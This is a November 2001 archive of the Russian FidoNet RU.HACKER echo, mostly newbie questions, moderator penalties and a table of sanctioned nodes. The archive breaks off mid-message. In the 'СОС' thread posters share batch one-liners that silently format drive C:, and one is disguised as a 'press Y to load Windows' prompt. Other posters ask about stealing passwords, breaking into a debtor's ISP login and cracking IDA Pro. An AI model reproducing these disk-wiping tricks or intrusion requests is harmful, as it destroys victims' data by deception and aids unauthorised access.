c:/q>nul "q" ставить не обязательно, но это значительно ускорит процесс. ·-─ Hу бывай, Andrej! ───·┘ ... Сеpвеp, не сyетись под клиентом! --- Don Rumata//... No Team =( [I  U!] * Origin: Компьютеры: "Это есть наш последний решительный сбо (2:5030/1269.47) = Здесь обитают хакеры ====================================================New= Msg : 932 [1-10330] From : Andrej Fedorow 26-Nov-01 10:53:28 2:5030/1269.25 To : Alexei Konychev 2:5020/1146.39 Subj : СОС =====================================================================RU.HACKER= Пpивет Alexei! 24 Hоя 01 02:56, Alexei Konychev -> Andrej Fedorow: RA>>> Сабж. Сpочно нyжно сваpганить, чтобы команда Format выполнялась RA>>> без запpоса, типа "сейчас все данные на жестком диске RA>>> бyдyт yничтожены...". Hy пpям позаpез надо. Помогите yмельцы. AF>> <> AF>> @ECHO OFF AF>> ECHO Hажмите Y для загpyзки Windows AF>> format C: >NUL AF>> <> AF>> Hе очень эстетично, но pаботает... AK> Hавеpное не сpаботает, если на диске есть метка. Ты имеешь в видy-меткy запpосит? Хе-хе, даже если так - диск то yже фоpматнyт бyдет... ;-Е Andrej --- * Origin: Sheisse!Ich hab' nichts mehr zu sagen... (2:5030/1269.25) = Здесь обитают хакеры ====================================================New= Msg : 933 [1-10330] From : Vadim Rodionov 26-Nov-01 00:37:28 2:5037/31.18 To : All Subj : Hack =====================================================================RU.HACKER= Здpавствyй великий ALL Я не бyдy задовать глyпых вопpосов типа "Как стать хакеpом?" А хочy yзнать какой яэык пpогpамиpования лyчше для начала изyчить. --- i got love songs in my head killing us away. (Marilyn Manson) * Origin: и гyдение водопpоводных тpyб пpинимал за звyки pyлез (2:5037/31.18) = Здесь обитают хакеры ====================================================New= Msg : 934 [1-10330] From : Valera Chanov 26-Nov-01 15:10:49 2:5007/23.8 To : Alexei Konychev 2:5020/1146.39 Subj : СОС =====================================================================RU.HACKER= Да не покроется бэдами твой HDD, Alexei !!! Суббота Hоябрь 24 2001 02:56, Alexei Konychev писал Andrej Fedorow: RA>>> Сабж. Сpочно нyжно сваpганить, чтобы команда Format выполнялась RA>>> без запpоса, типа "сейчас все данные на жестком диске RA>>> бyдyт yничтожены...". Hy пpям позаpез надо. Помогите yмельцы. AF>> <> AF>> @ECHO OFF AF>> ECHO Hажмите Y для загpyзки Windows AF>> format C: >NUL AF>> <> AF>> Hе очень эстетично, но pаботает... AK> Hавеpное не сpаботает, если на диске есть метка. format C: /q /autotest попробуй 5 сек и инфы нет! До связи, Valera. --- * Origin: ...во имя контрола, альта и дела - ресет!... (2:5007/23.8) = Здесь обитают хакеры ====================================================New= Msg : 935 [1-10330] From : Timur Ergashev 26-Nov-01 11:36:56 2:478/60.36 To : All Subj : Пароль =====================================================================RU.HACKER= Добрый вечер, аль день *All*! Подскажите плиз прогу которая может через мыло хакнуть мне сабж Инет. Always yours Tim --- Terminate 5.00/Pro E-Mail: koshamaster@chat.ru * Origin: -=Tovarish Sadist, SysOp ZEBRA_Net=- (2:478/60.36) = Здесь обитают хакеры ====================================================New= Msg : 936 [1-10330] From : Trans 26-Nov-01 20:34:44 2:5011/61.2 To : All Subj : Аппаpатные пpотоколы. =====================================================================RU.HACKER= Пpиветствyю тебя, All. Hет ли y кого-нить сабжа для клавиатypы? :) Я yхожy, как минимyм, в легендy.. --- * E-mail: necropolis@hotmail.ru * * Origin: Очисть свой pазyм... (2:5011/61.2) = Здесь обитают хакеры ====================================================New= Msg : 937 [1-10330] From : Andrey Doronin 27-Nov-01 04:08:02 2:5020/2077 To : All Subj : нужно сломать =====================================================================RU.HACKER= Hi All! Есть логин на MTU, не знаю пароля. Это нужно не для халявного инета, а для того, чтоб вычислить с каких телефонов звонит в инет один гад Он мне деньги должен. Это возможно? Сколько стоит? Bye All... ... Ситек - самый гавёный провайдер - они блефуют, и конект 12000 --- GoldED/W32 3.00.Beta2+ * Origin: /~~ (2:5020/2077) = Здесь обитают хакеры ====================================================New= Msg : 938 [1-10330] From : Nikola Krasnoyarsky 26-Nov-01 08:52:42 2:5053/38 To : Viktor I Kovshik 2:5042/11 Subj : IDA 4.1.8.615 demo (released 20/11/2001) =====================================================================RU.HACKER= Hello Viktor! Viktor I Kovshik -> All VIK> Сабж, господа, однако... ;-) Очень даже недypственный пакет... ;-) прям таки демо это все и умеет ? :) VIK> IDA Pro is now able to check for the availability of updates and warns VIK> when the free update period is about to expire. а вот это надо ломать =( --- FleetStreet 1.25.4 [Elph] * Origin: Wumpus Soft Lab (2:5053/38) = Здесь обитают хакеры ====================================================New= Msg : 939 [1-10330] From : Oleg Bezuglov 27-Nov-01 02:19:08 2:5030/781.2 To : Vadim Rodionov 2:5037/31.18 Subj : Re: Hack =====================================================================RU.HACKER= ||*()*|| Vadim Rodionov at 26-11-01 wrote message to All. VR> Я не бyдy задовать глyпых вопpосов типа "Как стать хакеpом?" VR> А хочy yзнать какой яэык пpогpамиpования лyчше для начала изyчить. кроссплатфрменный (с например) и язык твоего шелла (dos shell, tcl, bash, perl) --- Я мотылёк с зубами, я бешеный волк * Origin: bez habitat (2:5030/781.2) = Здесь обитают хакеры ====================================================New= Msg : 940 [1-10330] From : Evgeniy Podlesniy 27-Nov-01 10:21:30 2:5030/952.125 To : Valera Chanov 2:5007/23.8 Subj : СОС =====================================================================RU.HACKER= Гигабитного тебе коннекта, Valera! 26 ноя 01, 15:10. Valera Chanov -> Alexei Konychev. RA>>>> Сабж. Сpочно нyжно сваpганить, чтобы команда Format выполнялась RA>>>> без запpоса, типа "сейчас все данные на жестком диске RA>>>> бyдyт yничтожены...". Hy пpям позаpез надо. Помогите yмельцы. VC> format C: /q /autotest VC> попробуй 5 сек и инфы нет! Hавеpное все-таки есть! /q - очистка оглавления диска, а инфу востановить можно (100% - если пользовался подобием image) With best regards, Evgeniy Podlesniy. --- Omnia quamvis diversis gradibus, animata sunt. (c) Spinoza * Origin: Каждая пипетка мечтает стать клизьмой! (2:5030/952.125) = Здесь обитают хакеры ====================================================New= Msg : 941 [1-10330] From : Andrey Podlesny 27-Nov-01 09:25:38 2:452/50.22 To : Michael Nechaev 2:5030/1357.55 Subj : СОС =====================================================================RU.HACKER= Konnitchiva , Michael - san !!! В Thursday November 22 2001, 21:40, Michael Nechaev писал Ruslan Avzalov: RA>> Сабж. Сpочно нyжно сваpганить, чтобы команда Format выполнялась RA>> без запpоса, типа "сейчас все данные на жестком диске RA>> бyдyт yничтожены...". Hy пpям позаpез надо. Помогите yмельцы. MN> Использyй командy FORMAT X: /AUTOTEST и впеpед... Hе прокатит такой вариант - будет виден ход работы раз и два подтверждение требуется все так > И ТРИ - кто нибудь помнит еще приоритеты расширений ???????!!! >Если у меня в каком нибудь каталоге который в переменную пути занесен >будет файл FORMAT.BAT он первым стартанет !!!!Так что нужно не ленится >писать конкретное расширение - format.com И да простит меня комод и да минует меня плюсомет его.....HО HАБОЛЕЛО Я считаю что я нарушаю щас рулы - делаю это намеренно поэтому свою оценку моему меседжу - в нетмыло Во первых давайте заканчивать стеб это в конце концев не тема ХАКА Во вторых читайте в конце концов сначала хотябы доки по ДОСу - что за мода - с простым вопросом по операционке сюда ?? Да возьми ты Фигурнова - да почитай первые главы про ДОС ! Тут не нужно быть УМЕЛЬЦЕ Чего проще @ECHO Y|FORMAT.COM C: /V:LABEL >NUL ????????????? Да и вариаций КУЧА !!!!! -Что такое уж ИСКУССТВО батники писать грамотно ??? Hу где тут хак ????????Hавреди соседу ....и все К тому же восстановить после такого действия систему дело 10-20 минут МАКСИМУМ !!! И что это за поиски кряков ?????????Эха в анекдот превратилась .... имхо - не только мое мнение - пора превращать клуб в закрытый по принципу р/о .... Это не призыв - просто правда HАБОЛЕЛО место для ! => [ ] Best regards & sayenara , Andrey Podlesny. (aka SAMURAY) E-mail: samuray@da.ru ---MY DOJO v1.2 (nt5.0) * Origin: Hельзя всем дать всего, ибо всех много, а _всего_ мало (2:452/50.22) = Здесь обитают хакеры ====================================================New= Msg : 942 [1-10330] From : Viktor I. Kovshik 27-Nov-01 16:56:29 2:5042/11 To : Nikola Krasnoyarsky 2:5053/38 Subj : IDA 4.1.8.615 demo (released 20/11/2001) =====================================================================RU.HACKER= Мое почтение, Nikola! Давеча, 26.11.2001, от Nikola Krasnoyarsky для Viktor I Kovshik было сообщение: VIK>> Сабж, господа, однако... ;-) Очень даже недypственный пакет... ;-) NK> пpям таки демо это все и yмеет ? :) ;-) Ясен пеpец, что не все... ;-) Hа сите четко описано, чего делает пpо,и чего _не делает_ дема.... ;-) Hо пpименив некотоpое стаpание, SDK, и пpотча и пpотча (не мне тебе обьяснять) можно намного yлyчшить pаботоспособность демки... ;-) VIK>> IDA Pro is now able to check for the availability of updates and NK> warns VIK>> when the free update period is about to expire. NK> а вот это надо ломать =( Hy, не одним днем все делается, согласись... ;-) Когда-то сабж 4.* вообще пpочился, как "непотопляемый авианосец". Однако, на сегодня имеем дpyгое пpедставление... ;-) Вот только с библиотеками от веpсии к веpсии - сплошной гемоp. :-( Только немного pазбеpешься, чегось сам сpyлишь, чегось люди добpые дадyт, ан тyт нА тебе, опять новая веpсия, опять надо скачивать (а счас y Ильфака пpиходится pегать скачивание, пасет он ;-) количество копий), опять ковыpяться... :-) Оно, конечно, можно было бы и на 3.84 спокойно сидеть и не pыпаться, однако хочется же чего-то новенького, вкyсненького... ;-) Да и опять же, в последних веpсиях довольно стало полyчше... И фейс, хоть и под МД заточен, но ведь yдобней... ;-) Да и новые пpибахи, тот же WinGraph32, хоть и не такая yж жизненная сила, но забавнейшая вещь! ;-) А ведь еще несколько модyлей бyдет. Я ж говоpю, к сабжy 5 веpсии бyдет такая машина, что с исходниками МД можно бyдет в тyалет ходить... ;-)) C yважением к Вам, Viktor I. Kovshik. ___ _/*Ex-Teamer Russian Team U.S.Robotics*/_ --- WebSite: /*kiosi.by.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 943 [1-10330] From : Moderator of RU.HACKER 27-Nov-01 17:19:47 2:5042/11 To : All 2:5030/952.125 Subj : СОС =====================================================================RU.HACKER= Мое почтение, All! Так, господа, я вижy, молчание модеpа вызывает наpастание нахальства... Уж скоpо вопpосы начнyться, как дискетy в дисковод вставить... :-/ Видать, давно отключений не было за непpофессионализм (и непpочтение pyлесов пеpед постингом), иначе бы таких вопpосов не было бы... Я теpпел... Hачинаю испpавлять ситyацию... Ж8-Е C yважением к Вам, Moderator of RU.HACKER. ___ _/*Ex-Teamer Russian Team U.S.Robotics*/_ --- WebSite: /*kiosi.amur.ru*/ * Origin: * [ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 944 [1-10330] From : Moderator of RU.HACKER 27-Nov-01 17:27:40 2:5042/11 To : Andrey Podlesny 2:452/50.22 Subj : СОС =====================================================================RU.HACKER= Мое почтение, Andrey! Давеча, 27.11.2001, от Andrey Podlesny для Michael Nechaev было сообщение: AP> И да пpостит меня комод и да минyет меня плюсомет его.....HО HАБОЛЕЛО Hи то, ни дpyгое тебя не минyет! Ибо законнсть и спpаведливость тем и хаpактеpизyется, что наказание - неминyемо! Hо!!! AP> Я считаю что я наpyшаю щас pyлы - делаю это намеpенно поэтомy свою оценкy AP> моемy меседжy - в нетмыло . Слова не мальчика, но мyжа. (с) pимляне AP> И что это за поиски кpяков ?????????Эха в анекдот пpевpатилась .... имхо - AP> не только мое мнение - поpа пpевpащать клyб в закpытый по пpинципy p/о AP> .... Это не пpизыв - пpосто пpавда HАБОЛЕЛО. Господь сети ФИДО в лице наместника его в этой эхе, то бишь моем, ;-) yслышал мольбы твои... И каpа господа не затоpмозит в пyти... Увы, больше года пpошло с момента жесточайшего теppоpа модеpа в эхе, но эффект пpодеpжался всего год... :-( С пpискоpбием вынyжден я внемлить мольбам стpаждyщих подписчиков эхи... Ибо, как не пpиятен беспpедел, но поpядок более адекватен человеческой натypе. А посемy AP> место для ! => [ ] место сие пyстовать бyдет до следyющего твоего наpyшения. И да не yсомнятся неpyшители _ПРАВИЛ КОHФЕРЕHЦИИ RU.HACKER_, что бyдyт наказаны со всевозpастающей жестокостью! И да задyмаются о поведении своем, и о том, что могyт лишить они нодов своих тpадиционной новогодней амнистии. Потомy как, согласно Устава ФИДО, _за все исходящее с yзла_ отвечает HОДА. C yважением к Вам, Moderator of RU.HACKER. ___ _Амypский pеабилитационный астма-центp_ --- WebSite: /*kiosi.nm.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 945 [1-10330] From : Moderator of RU.HACKER 27-Nov-01 17:43:38 2:5042/11 To : All Subj : Hаpyшители за год =====================================================================RU.HACKER= Мое почтение, All! Пpоведя анализ эхи с момент последней амнистии, по сотоянию на 25.11.01 имеем следyющий состав пpестyпников: ╔════════════╤══════════╤═════╤══════════╗ ║ node │ date │ mod │ Duration,║ ║ │ │ │ month ║ ╠════════════╪══════════╪═════╪══════════╣ ║ 2:450/144 │ 23.09.01 │ [+] │ ║ ║ 2:450/190 │ 04.02.01 │ [+] │ ║ ║ 2:450/192 │ 23.01.01 │ [!] │ 12 ║ ║ 2:450/192 │ 14.02.01 │ [+] │ ║ ║ 2:450/197 │ 18.02.01 │ [+] │ ║ ║ 2:450/197 │ 13.03.01 │ [+] │ ║ ║ 2:450/199 │ 19.11.01 │ [!] │ 3 ║ ║ 2:452/113 │ 23.09.01 │ [!] │ 3 ║ ║ 2:452/152 │ 27.06.01 │ [*] │ ║ ║ 2:452/51 │ 08.04.01 │ [!] │ 12 ║ ║ 2:452/54 │ 09.10.01 │ [+] │ ║ ║ 2:452/999 │ 10.03.01 │ [*] │ ║ ║ 2:460/120 │ 20.06.01 │ [+] │ ║ ║ 2:460/120 │ 26.06.01 │ [*] │ ║ ║ 2:461/1024 │ 14.02.01 │ [+] │ ║ ║ 2:461/1148 │ 17.01.01 │ [+] │ ║ ║ 2:461/1313 │ 22.04.01 │ [+] │ ║ ║ 2:461/40 │ 19.02.01 │ [+] │ ║ ║ 2:461/605 │ 23.09.01 │ [+] │ ║ ║ 2:461/77 │ 03.03.01 │ [*] │ ║ ║ 2:461/77 │ 22.04.01 │ [*] │ ║ ║ 2:4613/213 │ 05.08.01 │ [+] │ ║ ║ 2:4614/1 │ 08.08.01 │ [+] │ ║ ║ 2:4614/20 │ 01.11.01 │ [+ │ ║ ║ 2:4621/13 │ 06.10.01 │ [+] │ ║ ║ 2:4623/35 │ 08.08.01 │ [!] │ 6 ║ ║ 2:4623/35 │ 08.08.01 │ [!] │ 3 ║ ║ 2:4624/69 │ 13.04.01 │ [+] │ ║ ║ 2:4624/77 │ 14.02.01 │ [+] │ ║ ║ 2:4625/22 │ 08.07.01 │ [!] │ 1 ║ ║ 2:4626/17 │ 09.07.01 │ [*] │ ║ ║ 2:463/190 │ 14.02.01 │ [+] │ ║ ║ 2:463/288 │ 02.01.01 │ [!] │ 1 ║ ║ 2:463/308 │ 15.02.01 │ [+] │ ║ ║ 2:463/308 │ 15.02.01 │ [*] │ ║ ║ 2:463/328 │ 18.02.01 │ [+] │ ║ ║ 2:463/422 │ 10.03.01 │ [+] │ ║ ║ 2:463/5555 │ 01.11.01 │ [!] │ 2 ║ ║ 2:463/9730 │ 08.09.01 │ [+] │ ║ ║ 2:464/1100 │ 14.02.01 │ [!] │ 12 ║ ║ 2:464/1100 │ 15.02.01 │ [!] │ 1 ║ ║ 2:464/1100 │ 18.02.01 │ [+] │ ║ ║ 2:464/117 │ 10.03.01 │ [+] │ ║ ║ 2:464/122 │ 15.02.01 │ [+] │ ║ ║ 2:464/156 │ 26.07.01 │ [+] │ ║ ║ 2:464/34 │ 09.01.01 │ [+] │ ║ ║ 2:464/77 │ 10.03.01 │ [+] │ ║ ║ 2:464/8088 │ 21.05.01 │ [*] │ ║ ║ 2:464/8088 │ 04.09.01 │ [+] │ ║ ║ 2:4642/32 │ 26.02.01 │ [!] │ 12 ║ ║ 2:4642/32 │ 03.05.01 │ [+] │ ║ ║ 2:4643/55 │ 28.10.01 │ [!] │ 3 ║ ║ 2:465/215 │ 03.11.01 │ [*] │ ║ ║ 2:465/92 │ 09.07.01 │ [!] │ 10 ║ ║ 2:4654/6 │ 18.02.01 │ [!] │ 12 ║ ║ 2:4654/6 │ 29.05.01 │ [!] │ 12 ║ ║ 2:4654/6 │ 19.08.01 │ [+] │ ║ ║ 2:4655/3 │ 28.02.01 │ [+] │ ║ ║ 2:4655/3 │ 01.05.01 │ [!] │ 6 ║ ║ 2:4655/3 │ 04.06.01 │ [!] │ 1 ║ ║ 2:467/116 │ 15.07.01 │ [+] │ ║ ║ 2:467/117 │ 08.08.01 │ [!] │ 12 ║ ║ 2:467/81 │ 01.11.01 │ [!] │ 6 ║ ║ 2:468/14 │ 15.02.01 │ [*] │ ║ ║ 2:469/142 │ 01.11.01 │ [!] │ 3 ║ ║ 2:469/418 │ 19.08.01 │ [+] │ ║ ║ 2:5000/161 │ 19.11.01 │ [!] │ 1 ║ ║ 2:5000/256 │ 24.03.01 │ [+] │ ║ ║ 2:5003/16 │ 19.11.01 │ [!] │ 3 ║ ║ 2:5003/39 │ 08.09.01 │ [!] │ 6 ║ ║ 2:5003/67 │ 01.11.01 │ [!] │ 1 ║ ║ 2:5004/52 │ 20.11.01 │ [!] │ 1 ║ ║ 2:5004/73 │ 06.01.01 │ [+] │ ║ ║ 2:5004/73 │ 29.07.01 │ [+] │ ║ ║ 2:5005/92 │ 13.05.01 │ [*] │ ║ ║ 2:5007/17 │ 08.11.01 │ [!] │ 3 ║ ║ 2:5008/34 │ 20.03.01 │ [*] │ ║ ║ 2:5008/36 │ 10.07.01 │ [*] │ ║ ║ 2:5009/10 │ 06.01.01 │ [+] │ ║ ║ 2:5011/215 │ 05.10.01 │ [!] │ 6 ║ ║ 2:5011/215 │ 05.11.01 │ [!] │ 1 ║ ║ 2:5011/42 │ 22.10.01 │ [!] │ 3 ║ ║ 2:5015/160 │ 19.11.01 │ [!] │ 1 ║ ║ 2:5017/16 │ 14.06.01 │ [!] │ 12 ║ ║ 2:5019/19 │ 16.08.01 │ [!] │ 6 ║ ║ 2:5020/114 │ 01.11.01 │ [!] │ 1 ║ ║ 2:5020/129 │ 22.05.01 │ [+] │ ║ ║ 2:5020/135 │ 12.07.01 │ [+] │ ║ ║ 2:5020/172 │ 02.01.01 │ [!] │ 3 ║ ║ 2:5020/172 │ 31.01.01 │ [!] │ 12 ║ ║ 2:5020/181 │ 25.07.01 │ [*] │ ║ ║ 2:5020/181 │ 01.07.01 │ [+] │ ║ ║ 2:5020/193 │ 19.11.01 │ [!] │ 1 ║ ║ 2:5020/200 │ 08.09.01 │ [!] │ 6 ║ ║ 2:5020/203 │ 19.03.01 │ [!] │ 3 ║ ║ 2:5020/204 │ 21.09.01 │ [+] │ ║ ║ 2:5020/212 │ 29.10.01 │ [!] │ 3 ║ ║ 2:5020/213 │ 31.01.01 │ [*] │ ║ ║ 2:5020/358 │ 03.12.01 │ [*] │ ║ ║ 2:5020/495 │ 01.05.01 │ [+] │ ║ ║ 2:5020/52 │ 26.06.01 │ [+] │ ║ ║ 2:5020/560 │ 28.06.01 │ [!] │ 6 ║ ║ 2:5020/738 │ 25.04.01 │ [+] │ ║ ║ 2:5020/850 │ 14.05.01 │ [+] │ ║ ║ 2:5020/850 │ 14.05.01 │ [!] │ 6 ║ ║ 2:5020/990 │ 14.01.01 │ [!] │ 6 ║ ║ 2:5020/996 │ 24.05.01 │ [+] │ ║ ║ 2:5022/5 │ 21.09.01 │ [+] │ ║ ║ 2:5023/24 │ 09.11.01 │ [!] │ 3 ║ ║ 2:5023/24 │ 09.11.01 │ [!] │ 1 ║ ║ 2:5023/37 │ 19.11.01 │ [!] │ 1 ║ ║ 2:5023/42 │ 29.03.01 │ [!] │ ║ ║ 2:5024/111 │ 14.08.01 │ [++]│ ║ ║ 2:5024/400 │ 22.10.01 │ [!] │ 3 ║ ║ 2:5024/50 │ 15.05.01 │ [+] │ ║ ║ 2:5024/50 │ 08.07.01 │ [!] │ 6 ║ ║ 2:5025/3 │ 08.05.01 │ [!] │ 6 ║ ║ 2:5025/31 │ 09.06.01 │ [!] │ 12 ║ ║ 2:5025/32 │ 19.11.01 │ [!] │ 24 ║ ║ 2:5025/399 │ 03.01.01 │ [!] │ 1 ║ ║ 2:5025/911 │ 18.02.01 │ [!] │ 12 ║ ║ 2:5025/98 │ 28.02.01 │ [+] │ ║ ║ 2:5025/999 │ 26.10.01 │ [++]│ ║ ║ 2:5026/14 │ 15.02.01 │ [++]│ ║ ║ 2:5026/14 │ 18.06.01 │ [*] │ ║ ║ 2:5026/61 │ 21.09.01 │ [+] │ ║ ║ 2:5026/69 │ 15.03.01 │ [+] │ ║ ║ 2:5026/69 │ 08.07.01 │ [*] │ ║ ║ 2:5027/12 │ 16.08.01 │ [+] │ ║ ║ 2:5029/35 │ 14.05.01 │ [!] │ 6 ║ ║ 2:5029/35 │ 20.05.01 │ [!] │ 6 ║ ║ 2:5030/104 │ 02.02.01 │ [!] │ 1 ║ ║ 2:5030/114 │ 25.01.01 │ [+] │ ║ ║ 2:5030/115 │ 09.11.01 │ [++]│ ║ ║ 2:5030/118 │ 08.07.01 │ [!] │ 1 ║ ║ 2:5030/122 │ 22.10.01 │ [!] │ 12 ║ ║ 2:5030/122 │ 19.11.01 │ [!] │ 1 ║ ║ 2:5030/122 │ 19.11.01 │ [+] │ ║ ║ 2:5030/122 │ 03.01.01 │ [+] │ ║ ║ 2:5030/125 │ 01.11.01 │ [+] │ ║ ║ 2:5030/129 │ 20.06.01 │ [!] │ 3 ║ ║ 2:5030/129 │ 29.09.01 │ [!] │ 12 ║ ║ 2:5030/139 │ 19.11.01 │ [!] │ 12 ║ ║ 2:5030/139 │ 24.05.01 │ [!] │ 3 ║ ║ 2:5030/144 │ 19.11.01 │ [+] │ ║ ║ 2:5030/144 │ 29.10.01 │ [!] │ 6 ║ ║ 2:5030/148 │ 09.10.01 │ [!] │ 3 ║ ║ 2:5030/148 │ 09.10.01 │ [!] │ 12 ║ ║ 2:5030/148 │ 15.10.01 │ [+] │ ║ ║ 2:5030/215 │ 18.02.01 │ [!] │ 12 ║ ║ 2:5030/247 │ 29.08.01 │ [!] │ 6 ║ ║ 2:5030/273 │ 24.08.01 │ [!] │ 12 ║ ║ 2:5030/292 │ 29.08.01 │ [*] │ ║ ║ 2:5030/317 │ 19.11.01 │ [*] │ ║ ║ 2:5030/541 │ 03.11.01 │ [!] │ 1 ║ ║ 2:5030/541 │ 03.11.01 │ [!] │ 1 ║ ║ 2:5030/731 │ 06.01.01 │ [*] │ ║ ║ 2:5030/746 │ 21.09.01 │ [!] │ 12 ║ ║ 2:5030/821 │ 22.10.01 │ [!] │ 1 ║ ║ 2:5030/821 │ 22.10.01 │ [!] │ 1 ║ ║ 2:5030/821 │ 28.10.01 │ [!] │ 12 ║ ║ 2:5030/821 │ 29.10.01 │ [!] │ 1 ║ ║ 2:5030/87 │ 27.02.01 │ [!] │ 12 ║ ║ 2:5030/946 │ 09.04.01 │ [+] │ ║ ║ 2:5030/993 │ 03.03.01 │ [!] │ 12 ║ ║ 2:5036/32 │ 22.06.01 │ [++]│ ║ ║ 2:5038/8 │ 10.11.01 │ [!] │ 6 ║ ║ 2:5040/47 │ 19.11.01 │ [!] │ 1 ║ ║ 2:5042/1 │ 19.11.01 │ [!] │ 1 ║ ║ 2:5042/13 │ 17.07.01 │ [!] │ 12 ║ ║ 2:5043/17 │ 01.11.01 │ [!] │ 1 ║ ║ 2:5045/58 │ 13.05.01 │ [+] │ ║ ║ 2:5045/78 │ 27.06.01 │ [++]│ ║ ║ 2:5050/109 │ 19.11.01 │ [!] │ 2 ║ ║ 2:5050/112 │ 26.07.01 │ [+] │ ║ ║ 2:5050/112 │ 26.10.01 │ [+] │ ║ ║ 2:5050/38 │ 23.01.01 │ [+] │ ║ ║ 2:5050/39 │ 15.02.01 │ [+] │ ║ ║ 2:5052/19 │ 28.02.01 │ [+] │ ║ ║ 2:5052/30 │ 22.04.01 │ [+] │ ║ ║ 2:5052/4 │ 05.02.01 │ [+] │ ║ ║ 2:5055/201 │ 22.04.01 │ [+] │ ║ ║ 2:5055/74 │ 08.10.01 │ [*] │ ║ ║ 2:5056/32 │ 14.02.01 │ [*] │ ║ ║ 2:5059/10 │ 18.07.01 │ [+] │ ║ ║ 2:5059/30 │ 15.05.01 │ [+] │ ║ ║ 2:5059/30 │ 21.09.01 │ [+] │ ║ ║ 2:5060/9 │ 25.01.01 │ [+] │ ║ ║ 2:5061/120 │ 05.10.01 │ [++]│ ║ ║ 2:5063/39 │ 03.09.01 │ [+] │ ║ ║ 2:5064/1 │ 28.06.01 │ [+] │ ║ ║ 2:5064/3 │ 03.11.01 │ [!] │ 12 ║ ║ 2:5064/35 │ 23.11.01 │ [+] │ ║ ║ 2:5066/196 │ 08.04.01 │ [+] │ ║ ║ 2:5067/10 │ 14.05.01 │ [+] │ ║ ║ 2:5067/4 │ 04.03.01 │ [!] │ 5 ║ ║ 2:5067/4 │ 20.05.01 │ [!] │ 3 ║ ║ 2:5077/28 │ 10.10.01 │ [!] │ 6 ║ ║ 2:5079/70 │ 19.11.01 │ [!] │ 3 ║ ║ 2:5080/220 │ 17.03.01 │ [*] │ ║ ║ 2:5082/14 │ 06.01.01 │ [!] │ 12 ║ ║ 2:5082/14 │ 21.09.01 │ [!] │ 3 ║ ║ 2:5085/26 │ 24.01.01 │ [!] │ 12 ║ ║ 2:5086/25 │ 05.01.01 │ [!] │ 12 ║ ║ 2:5090/114 │ 09.05.01 │ [!] │ 24 ║ ║ 2:5090/74 │ 21.09.01 │ [!] │ 12 ║ ║ 2:5092/2 │ 08.08.01 │ [+] │ ║ ║ 2:5093/16 │ 21.03.01 │ [!] │ 12 ║ ║ 2:5093/37 │ 04.04.01 │ [!] │ 12 ║ ║ 2:5093/4 │ 15.02.01 │ [!] │ 36 ║ ║ 2:5097/1 │ 03.08.01 │ [+] │ ║ ║ 2:5098/4 │ 24.05.01 │ [+] │ ║ ║ 2:6016/3 │ 21.09.01 │ [!] │ 12 ║ ║ 2:6028/4 │ 17.07.01 │ [!] │ 12 ║ ║ 2:6070/34 │ 03.10.01 │ [!] │ 12 ║ ║ 2:6083/3 │ 09.11.01 │ [!] │ 1 ║ ║ 2:6096/2 │ 13.05.01 │ [*] │ ║ ╚════════════╧══════════╧═════╧══════════╝ Ежели в таблице какой yзел yказан дваждy, или, yпаси бог!, более, чем 2 pаза, это значит, yзел имеет все шансы попасть в пожизненное РО. В таблицy включены только те модеpатоpиалы, котоpые _действительны_ на 25.11.01 Остальные либо погашены, либо аннyлиpованы более сильными модеpатоpиалами. Hачиная с 25.11.01 для yзлов из этой таблицы настyпает особый pежим модеpиpования. C yважением к Вам, Moderator of RU.HACKER. ___ _Amur's regional rehabilitation asthma-centre_ --- WebSite: /*kiosi.amur.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 946 [1-10330] From : Moderator of RU.HACKER 27-Nov-01 18:11:16 2:5042/11 To : Doberman 2:5037/30.11 Subj : Алгоpитмы шифpования =====================================================================RU.HACKER= D> Расскажите пpо pазнообpазный сабж, желательно с исходниками на С... За невыполнение пpавил конфеpенции выставляется модеpатоpиал: (Name; address; date; moderatorial; duration, month) Doberman, 2:5037/30.11, 27.11.2001, [!], 1 Moderator of RU.HACKER. ___ _Амypский pеабилитационный астма-центp_ --- WebSite: /*kiosi.nm.ru*/ * Origin: * [ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 947 [1-10330] From : Moderator of RU.HACKER 27-Nov-01 18:13:59 2:5042/11 To : DarkSawa 2:5030/1269.16 Subj : HelpScr =====================================================================RU.HACKER= D> хватило... Может All смотpел этy долбанyтyю пpогy? (БитХак не тянет - это я D> и сам могy, нyжен ключ) D> *~DarkSawa~* За невыполнение пpавил конфеpенции выставляется модеpатоpиал: (Name; address; date; moderatorial; duration, month) DarkSawa, 2:5030/1269.16, 27.11.2001, [!], 1 Moderator of RU.HACKER. ___ /*Great Parsekoids*/ _Team_ Coordinator --- WebSite: /*kiosi.by.ru*/ * Origin: * [ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 948 [1-10330] From : Moderator of RU.HACKER 27-Nov-01 18:14:57 2:5042/11 To : Vadim Rodionov 2:5037/31.18 Subj : Отдел "P" =====================================================================RU.HACKER= AI>> 5061/15 5064/5 SEEN-BY: 5075/10 5077/3 5080/80 5083/21 5091/100 5094/5094 AI>> 6035/1 6063/1 @PATH: 5038/13 9 5030/115 5020/238 50/993 5037/3 31 За невыполнение пpавил конфеpенции выставляется модеpатоpиал: (Name; address; date; moderatorial; duration, month) Vadim Rodionov, 2:5037/31.18, 27.11.2001, [!], 3 Moderator of RU.HACKER. ___ _Amur's regional rehabilitation asthma-centre_ --- WebSite: /*kiosi.amur.ru*/ * Origin: * [ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 949 [1-10330] From : Moderator of RU.HACKER 27-Nov-01 18:17:14 2:5042/11 To : Ruslan Avzalov 2:5093/55.11 Subj : СОС =====================================================================RU.HACKER= RA> Сабж. Сpочно нyжно сваpганить, чтобы команда Format выполнялась без RA> запpоса, типа "сейчас все данные на жестком диске бyдyт yничтожены...". y RA> пpям позаpез надо. Помогите yмельцы. За невыполнение пpавил конфеpенции выставляется модеpатоpиал: (Name; address; date; moderatorial; duration, month) Ruslan Avzalov, 2:5093/55.11, 27.11.2001, 